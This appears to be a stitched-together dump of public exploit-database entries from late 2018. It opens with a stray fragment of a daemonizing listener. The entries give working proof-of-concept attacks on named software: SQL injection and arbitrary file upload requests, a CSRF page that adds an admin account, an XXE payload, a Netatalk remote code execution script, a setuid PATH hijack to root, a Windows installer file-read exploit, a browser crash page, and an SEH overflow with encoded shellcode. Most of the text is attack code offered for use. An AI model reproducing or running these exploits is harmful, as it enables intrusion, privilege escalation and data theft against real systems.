# Module entry: bind the listener first (the socket survives the forks), detach
# (daemonize only forks on POSIX), then serve until the process is killed.
z = mysql_listener()
daemonize()
asyncore.loop()
The bug is in “MsiAdvertiseProduct”
Calling this function will result in a file copy by the installer service.
This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer. A check is done while impersonating, but using junctions there is still a TOCTOU, meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results in an arbitrary file read vulnerability.
To reproduce:
Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory.
Usage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”)
Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o
The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
Even without an enumeration vector, this is still bad news, because a lot of document software, like Office, keeps files in static locations that contain the full paths and filenames of recently opened documents. By reading files like this you can get the filenames of documents created by other users; the filesystem is a spiderweb and references to user-created files can be found everywhere, so not having an enumeration bug is not that big of a deal.
If shadow copies are enabled you can obviously steal the SAM and SYSTEM hive I assume...
Maybe there's some other use-cases.. but I'm not very smart, so I don't know.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46040.rar
# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
# Google Dork: N/A
# Date: 2018-12-22
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://frontaccounting.com/
# Software Link: https://sourceforge.net/projects/frontaccounting/
# Version: 2.4.5
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64
# CVE : N/A
# ========================= Vendor Summary =====================
#
# FrontAccounting (FA) is a professional web-based Accounting system for
# the entire ERP chain written in PHP, using MySQL. FA is multilingual and
# multicurrency.
#
# ======================== Vulnerability Description ===============
#
# The parameter "filterType" in /attachments.php is vulnerable to time-based
# blind SQL injection.
#
# ======================== PoC =======================================
POST /frontaccounting/admin/attachments.php? HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/frontaccounting/admin/attachments.php?
Content-Type: application/x-www-form-urlencoded
Content-Length: 367
DNT: 1
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx
# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-22
# Vendor Homepage: https://angryip.org/
# Software Link : https://angryip.org/download/
# Tested Version: 3.5.3 (latest version)
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)
# Steps to Reproduce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open Xangry.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
# 6.- The application crashes
#!/usr/bin/env python
# Build the 392-byte crash string (384 filler bytes followed by two 4-byte
# markers) and write it to Xangry.txt in the current directory.
buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xangry.txt", "w")
with f:
    f.write(crash)
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<!-- CSRF proof of concept: an auto-submitting cross-origin POST to the admin
     "add staff" endpoint, sent with whatever admin session the victim's browser
     holds. The script below fills every hidden field and submits on load.
     Mitigation on the application side: a per-session anti-CSRF token checked by
     the staffs/add handler; SameSite session cookies reduce exposure further. -->
</head>
<body>
<form action="http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/index.php/admin/staffs/add.html" id="test" name='test' method="POST">
<input type="hidden" name='staffId' value="" />
<input type="hidden" name='loginName' value="" />
<input type="hidden" name='staffPhoto' value="" />
<input type="hidden" name='loginPwd' value="" />
<input type="hidden" name='staffName' value="" />
<input type="hidden" name='staffNo' value="" />
<input type="hidden" name='RoleId' value="" />
<input type="hidden" name='staffPhone' value="" />
<input type="hidden" name='wxOpenId' value="" />
<input type="hidden" name='workStatus' value="" />
<input type="hidden" name='staffStatus' value="" />
</form>
<script type="text/javascript">
// Field values as chosen by the author; the form is submitted immediately.
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
</script>
</body>
</html>
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46051.zip
Password: infected
# Product Description
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.
# Vulnerabilities List
One vulnerability was identified within the PhpSpreadsheet library.
# Affected Version
Versions <=1.5.0
# Solution
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.
This vulnerability is described in the following section.
# XML External Entity (XXE) Injection
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.
# Vulnerability Details
CVE ID: CVE-2018-19277
Access Vector: Network
Security Risk: High
Vulnerability: CWE-611
CVSS Base Score: 7.7
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:
```
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
```
The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.
When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.
import socket
import struct
import sys
# Usage: <script> <ip> <port>; any other argument count exits silently.
if len(sys.argv) != 3:
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
# Stage 1: a DSI OpenSession whose option payload carries more than the client
# quantum; per the author's annotations the extra fields overwrite session state
# on the server. The "I"/"Q" formats have no byte-order prefix, so these values
# are packed in the host's native order, and the addresses are build-specific.
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
# DSI header: flags, command, request id, data offset, big-endian length, reserved.
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"
# Stage 2: an AFP command whose first byte selects the table entry set up above.
# Defensive note: an OpenSession option longer than the 4-byte quantum is the
# observable anomaly here; patching the server is the fix.
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print resp
print "[+] Fin."
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path, and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application into executing a custom fusermount binary as root.
## Environment
CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64
RPM info
```
Name : keybase
Version : 2.8.0.20181017144746.3efc4cbf3c
Release : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group : Unspecified
Size : 273302678
License : BSD
Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host : 6ae61e160e87
Relocations : (not relocatable)
Summary : Keybase command line client
Description :
Keybase command line client
```
An unprivileged user named user1 is used for this PoC.
## Steps to reproduce
1) Display privileges of user 1 - execute the id command
```
[user1@localhost woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```
2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv)
{
    /* PoC stand-in for fusermount. It runs as root only because the setuid
     * keybase-redirector resolves "fusermount" through the caller's $PATH; the
     * fix belongs in the setuid binary (absolute path, or a sanitized PATH). */
    setreuid(0,0);
    system("/usr/bin/touch /w00t");  /* marker file showing root execution */
    return(0);
}
EOF
```
3) Compile fusermount.c
```
gcc -Wall fusermount.c -o fusermount
```
4) Verify that /w00t does not exist.
```
[user1@localhost woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```
5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```
6) Enter the control-c sequence to kill the application.
```
[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```
7) Verify that /w00t exists
```
[user1@localhost woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[user1@localhost woot]$
```
## Impact
Unauthorized root access is possible, which impacts the confidentiality, integrity, and availability of the system.
<!---
title: Crash Chrome 70 with the SQLite Magellan bug
categories: chrome
permalink: /sqlitebug/
layout: post
---!>
<p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
<p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
<button onClick="crash()" style="font-size: 150%">Crash this page</button>
<p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
<p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
<h1>Sign up for more information</h1>
<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
<form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank">
<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email">
<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div>
<input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button">
</form>
<h1>What's supposed to happen?</h1>
<p>After you press the button, the page should crash:</p>
<p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p>
<p>On Android 5.1, I get a segfault in memcpy:</p>
<pre style="font-size: 10px">
F/libc ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
I/DEBUG ( 142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
I/DEBUG ( 142): Revision: '0'
I/DEBUG ( 142): ABI: 'arm'
I/DEBUG ( 142): pid: 3801, tid: 3854, name: Database thread >>> com.android.chrome:sandboxed_process6 <<<
I/DEBUG ( 142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
I/DEBUG ( 142): r0 e0ddb457 r1 611be0ab r2 00000002 r3 ff000000
I/DEBUG ( 142): r4 611be038 r5 00000002 r6 611be0a9 r7 7fffffff
I/DEBUG ( 142): r8 00000001 r9 611be0ab sl 80000001 fp 00000000
I/DEBUG ( 142): ip 00000066 sp 6defd3a0 lr 00000074 pc 4025eb62 cpsr 680f2430
I/DEBUG ( 142):
I/DEBUG ( 142): backtrace:
I/DEBUG ( 142): #00 pc 0000fb62 /system/lib/libc.so (__memcpy_base+217)
I/DEBUG ( 142): #01 pc 018d0e1d /data/app/com.android.chrome-1/base.apk
</pre>
<h1>What's affected?</h1>
<p>Affected: tested, causes one tab/one window to crash:</p>
<ul>
<li>Chrome 70.0.3538.110 on Android 5.1 and 9</li>
<li>Electron 2.0.12 on macOS 10.14</li>
</ul>
<p>Not affected:</p>
<ul>
<li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li>
<li>Safari (doesn't have FTS enabled in SQLite3)</li>
<li>Browsers not based on Chrome (no WebSQL support)</li>
</ul>
<script>
// https://gist.github.com/nolanlawson/0264938033aca2201012
// https://www.sqlite.org/src/info/940f2adc8541a838
// WebSQL database for the demo: name, version, display name, estimated size.
const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000);
// Set-up: an FTS3 virtual table with three rows, so that an ft_segdir row exists.
const firstStatements = [
  "DROP TABLE IF EXISTS ft;",
  "CREATE VIRTUAL TABLE ft USING fts3;",
  "INSERT INTO ft VALUES('aback');",
  "INSERT INTO ft VALUES('abaft');",
  "INSERT INTO ft VALUES('abandon');",
];
// Trigger: replace the segment root blob with the bytes from the SQLite test case
// linked above, then run a MATCH that reads it.
const secondStatements = [
  "SELECT quote(root) from ft_segdir;",
  "UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';",
  "SELECT * FROM ft WHERE ft MATCH 'abandon';"
];
function dbSuccess() {
  // Per-statement success callback: log a marker, then whatever arguments
  // the WebSQL layer supplied.
  const received = arguments;
  console.log("success");
  console.log(received);
}
function dbErr() {
  // Error callback shared by statements and transactions: log a marker, then
  // whatever arguments the WebSQL layer supplied.
  const received = arguments;
  console.log("err");
  console.log(received);
}
function runAll(statements, success) {
  // Queue every statement inside one transaction. Per-statement outcomes go to
  // dbSuccess/dbErr, a failed transaction to dbErr, completion to `success`.
  db.transaction((tx) => {
    console.log("alive");
    statements.forEach((statement) => {
      console.log("queueing " + statement);
      tx.executeSql(statement, [], dbSuccess, dbErr);
    });
    console.log("queued");
  }, dbErr, success);
}
// Button handler: run the set-up statements, and only after that transaction
// completes, the trigger statements (each completion event is logged).
function crash() {
  runAll(firstStatements, (event) => {
    console.log(event);
    runAll(secondStatements, (event) => {
      console.log(event);
    });
  });
}
// onload
function getChromeVersion(userAgent) {
  // The version is the text after "Chrome/" or "Chromium/" in the first
  // space-separated token that starts with either; null when there is none.
  const tokens = userAgent.split(" ");
  const hit = tokens.find((t) => t.startsWith("Chrome/") || t.startsWith("Chromium/"));
  return hit === undefined ? null : hit.slice(hit.indexOf("/") + 1);
}
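function isChromeSupported(chromeVersion) {
  // True when the major version is 70 or lower (the range this demo targets).
  // parseInt stops at the first non-digit, so "70.0.3538.110" and a bare "70"
  // both give 70 (the original returned false for a version without a dot);
  // a missing or non-numeric version gives false.
  if (chromeVersion == null) return false;
  const major = parseInt(chromeVersion, 10);
  return !Number.isNaN(major) && major <= 70;
}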
function getPromptText(userAgent) {
  // Pick the instruction shown above the button: no Chrome version found,
  // Chrome 70 or below, or a newer Chrome.
  const chromeVersion = getChromeVersion(userAgent);
  if (chromeVersion == null) {
    return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button.";
  }
  return isChromeSupported(chromeVersion)
    ? "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page."
    : "Your Chrome is too new. Open this page in Chrome 70, then tap the button.";
}
function onLoad() {
  // Fill the two placeholder spans from the browser's user agent string.
  const userAgent = navigator.userAgent;
  const byId = (id) => document.getElementById(id);
  byId("browserUserAgent").textContent = userAgent;
  byId("prompttext").textContent = getPromptText(userAgent);
}
window.onload = onLoad; // populate the UA and prompt text once the page has loaded
</script>
# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/audio-record/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.0
# Category: webapps
# Unrestricted file upload in the record upload process allows an arbitrary file extension.
# File: recorder.php
# Vulnerable code:
// Vulnerable handler as quoted in the advisory (closing braces omitted by the author).
function save_record_callback() {
    foreach(array('audio') as $type) {
        if (isset($_FILES["${type}-blob"])) {
            // The caller-supplied "${type}-filename" POST field is used verbatim apart
            // from a uniqid() prefix: no sanitize_file_name() and no
            // wp_check_filetype_and_ext() on the upload, so any extension is accepted.
            $fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
            $path_array = wp_upload_dir();
            $path = str_replace('\\', '/', $path_array['path']);
            $uploadDirectory = $path . "/$fileName";
            // The blob is moved straight into the web-served uploads directory; no
            // nonce (check_ajax_referer) or capability (current_user_can) check is shown.
            if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
                echo 000;
                wp_die("problem moving uploaded file");
            }
# Exploitation example:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-filename"
file.php
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-blob"; filename="blob"
Content-Type: audio/wav
<?php phpinfo();
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="action"
save_record
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="course_id"
undefined
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="unit_id"
undefined
-----------------------------18311719029180117571501079851--
# Uploaded file will be located at standard WordPress media upload directory (for ex: /wp-content/uploads/year/month/).
# If directory listing is disabled, the file name can still be guessed because uniqid() is not cryptographically secure.
# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2018-12-24
# Vulnerable Software: MAGIX Music Editor 3.1
# Vendor Homepage: https://www.magix.com/us/
# Version: 3.1
# Software Link: https://www.magix.com/us/music/mp3-deluxe/
# Music Editor Software is bundled with MP3 Deluxe 19
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. open music editor 3
# 3. go to CD > freedb options > FreeDB Proxy Options
# 4. copy/paste magix.txt contents into Server field
# 5. select Accept settings
# 6. pop calc
#!/usr/bin/python
# Python 2 script: the "\x.." string literals below are byte strings, so the
# escapes are written to disk verbatim. Under Python 3 the same literals are
# text and a 'w'-mode write would re-encode bytes >= 0x80 as UTF-8, changing
# the file contents.
filename="magix.txt"
#lol
# Padding up to the SEH record; the overflow is triggered by the oversized
# "Server" value in the FreeDB proxy settings (see PoC steps above).
junk = "A"*420
#jump 6
# Next-SEH pointer: a short jump forward over the handler address into the payload.
nseh = "\xeb\x06\xcc\xcc"
#0x10015b08 : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [dac3x.dll]
# Handler address as little-endian bytes of 0x10015b08 (the gadget noted above).
seh = "\x08\x5b\x01\x10"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00" -e x86/alpha_mixed -f c
#Payload size: 447 bytes
# alpha_mixed-encoded payload; everything after the short decoder stub is
# alphanumeric, which is why the page-module gadget only needs to be "ascii".
calc = ("\xda\xd4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4b\x58\x4b\x32\x67\x70\x55\x50\x45\x50\x45\x30\x6e\x69"
"\x6b\x55\x54\x71\x49\x50\x65\x34\x6c\x4b\x72\x70\x70\x30\x6e"
"\x6b\x76\x32\x46\x6c\x6c\x4b\x43\x62\x65\x44\x4e\x6b\x50\x72"
"\x64\x68\x66\x6f\x58\x37\x52\x6a\x31\x36\x45\x61\x4b\x4f\x6e"
"\x4c\x67\x4c\x43\x51\x61\x6c\x75\x52\x34\x6c\x51\x30\x6b\x71"
"\x7a\x6f\x56\x6d\x45\x51\x78\x47\x7a\x42\x4c\x32\x56\x32\x56"
"\x37\x6e\x6b\x32\x72\x42\x30\x4e\x6b\x32\x6a\x37\x4c\x6c\x4b"
"\x72\x6c\x67\x61\x61\x68\x4a\x43\x30\x48\x73\x31\x6b\x61\x66"
"\x31\x6e\x6b\x43\x69\x57\x50\x46\x61\x5a\x73\x4c\x4b\x51\x59"
"\x42\x38\x4d\x33\x37\x4a\x30\x49\x6e\x6b\x46\x54\x6c\x4b\x76"
"\x61\x68\x56\x65\x61\x4b\x4f\x4c\x6c\x5a\x61\x78\x4f\x56\x6d"
"\x56\x61\x58\x47\x65\x68\x4b\x50\x53\x45\x48\x76\x37\x73\x71"
"\x6d\x78\x78\x55\x6b\x31\x6d\x44\x64\x64\x35\x59\x74\x72\x78"
"\x4c\x4b\x31\x48\x66\x44\x36\x61\x6a\x73\x70\x66\x6e\x6b\x74"
"\x4c\x42\x6b\x6e\x6b\x46\x38\x57\x6c\x36\x61\x38\x53\x6c\x4b"
"\x64\x44\x6c\x4b\x46\x61\x5a\x70\x6d\x59\x32\x64\x61\x34\x46"
"\x44\x53\x6b\x61\x4b\x63\x51\x36\x39\x31\x4a\x52\x71\x69\x6f"
"\x4b\x50\x71\x4f\x61\x4f\x70\x5a\x6e\x6b\x66\x72\x78\x6b\x6c"
"\x4d\x31\x4d\x31\x7a\x43\x31\x4e\x6d\x4b\x35\x68\x32\x47\x70"
"\x65\x50\x65\x50\x36\x30\x62\x48\x54\x71\x4c\x4b\x42\x4f\x4f"
"\x77\x59\x6f\x4e\x35\x4d\x6b\x68\x70\x68\x35\x4d\x72\x52\x76"
"\x30\x68\x4e\x46\x5a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4a\x75\x35"
"\x6c\x46\x66\x73\x4c\x75\x5a\x4d\x50\x69\x6b\x79\x70\x51\x65"
"\x76\x65\x6f\x4b\x33\x77\x74\x53\x31\x62\x70\x6f\x73\x5a\x33"
"\x30\x76\x33\x39\x6f\x58\x55\x30\x63\x75\x31\x52\x4c\x73\x53"
"\x36\x4e\x52\x45\x53\x48\x32\x45\x65\x50\x41\x41")
# Trailing filler; makes the pasted value large enough to reliably reach the
# handler record. From a defender's view, a proxy "Server" setting of several
# kilobytes made up of long 'A'/'C' runs is the observable artefact.
fill = "C"*2000
buffer = junk + nseh + seh + calc + fill
# Text-mode write; on Windows Python 2 only "\n" would be translated, and the
# buffer as listed appears not to contain one — verify if the output differs.
# No 'with' block: the handle is closed explicitly on the last line.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()